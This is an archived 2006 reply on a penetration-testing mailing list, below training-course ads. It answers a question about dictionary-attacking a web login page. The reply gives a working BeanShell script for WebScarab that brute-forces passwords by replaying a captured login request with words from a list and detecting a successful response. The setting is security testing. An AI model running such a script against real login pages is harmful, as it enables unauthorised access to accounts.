Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Pen-Test
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: BruteForcing?

from [Rogan Dawes] Network Security [Permanent Link]
Subject: Re: BruteForcing?
Date: Wed, 18 Oct 2006 10:28:35 +0200
Troy Fletcher wrote: 
Sparky,

For brute forcing WebPages, I use Perl scripts combined with Linux tools
like cURL and Wget. If you know any programming/scripting languages, I
can point you in the right direction. To help see the traffic exchange
for a WebPage login attempts I recommend using a proxy like WebScarab;
once you see the POSTs or GETs automating attacks with cURL is easy. I
don't know any _good_ pre-made WebPage bruteforce tools, but I'm sure
that if someone else does; they'll share.

WebScarab can also be used to brute force web pages, using the Scripted plugin. One major advantage to using WebScarab is that your attack is/can be multi-threaded automatically: WebScarab will attempt up to 4 simultaneous requests.

Here is a simple script that uses an existing request as a template (for URL's, methods, headers, etc) and just replaces the request body. In my example, I'll take words from an predefined array, but the technique can very easily be extended to reading lines from a file.

The script language is BeanShell, which is very similar to Java (BeanShell can evaluate actual Java classes in "strict" mode).

// check the source (or the appendix in the online help) for the
// methods you can use on Request and Response
import org.owasp.webscarab.model.Request;
import org.owasp.webscarab.model.Response;

// This function/method is the main loop.
// You need to provide three methods that this function will invoke
//
// boolean hasMoreRequests() - if there are more requests to issue
// Request getNextRequest()  - the next request to submit
// void handleResponse(Response response) - allows you to do something
//                             with the responses obtained
//
void fetchParallel() {
    // while we have more requests to submit, or we are busy processing
    // the last requests sent off/waiting for a response
    while (hasMoreRequests() || scripted.isAsyncBusy()) {
        // while there are fewer than 4 outstanding requests
        // and we have more to try
        while (scripted.hasAsyncCapacity() && hasMoreRequests()) {
            scripted.submitAsyncRequest(getNextRequest());
        }
        // if there is a response waiting to be processed
        if (scripted.hasAsyncResponse()) {
            while (scripted.hasAsyncResponse()) {
                handleResponse(scripted.getAsyncResponse());
            }
        } else Thread.sleep(100);
    }
}

String[] words = new String[] {"word1", "word2", "word3", "word4"};
int nextWord = 0;
boolean stop = false;
// This gets a copy of the request with ID 17, from the past
// conversations. Adjust to suit your particular situation.
Request template = scripted.getRequest(53);

boolean hasMoreRequests() {
    return nextWord < words.length || stop;
}

Request getNextRequest() {
    Request req = new Request(template); // make a copy
    String word = words[nextWord++]; // increment the counter
    out.println("Trying " + word);
    // Note that the content is always a byte array
    // you might also want to consider URLEncoding your words?
    // Also note that IF there is an existing Content-Length header
    // it will automatically be updated to match the length of the
    // content
    req.setContent(("username=joe&password=" + word).getBytes());
    return req;
}

void handleResponse(Response response) {
    byte[] content = response.getContent();
    if (response.getStatus().equals("200") && content != null) {
        String html = new String(content); // consider encoding?
        if (html.indexOf("successful")>-1) {
            // we're in! Save it for review
            scripted.addConversation(response);
            stop = true;
        }
    }
}

// start the main loop
fetchParallel();



-----Original Message-----
From: listbounce@securityfocus.com
[mailto:listbounce@securityfocus.com]On Behalf Of 09sparky@gmail.com
Sent: Sunday, October 15, 2006 12:03 PM
To: pen-test@securityfocus.com
Subject: BruteForcing?


This is more of a general brute forcing question, but one which I could
use some assistance.

[snip] 
Second question: Brute forcing also, but against WebPages.  For example,
a Cisco 3000 VPN Concentrator, I have the webpage asking for
username/password.  How would I attempt to dictionary attack this?

Thanks,
Sparky



------------------------------------------------------------------------
This List Sponsored by: Cenzic

Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
------------------------------------------------------------------------

[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: VLAN hopping - demonstration, David M. Zendzian
Next by Date:  SecureDVD - Live Pen-Testing Distro, kratzer . jason
Previous by Thread:  RE: BruteForcing?, Troy Fletcher
Next by Thread:  RE: BruteForcing?, Troy Fletcher
Indexes:  [Date] [Thread] [Top] [All Lists]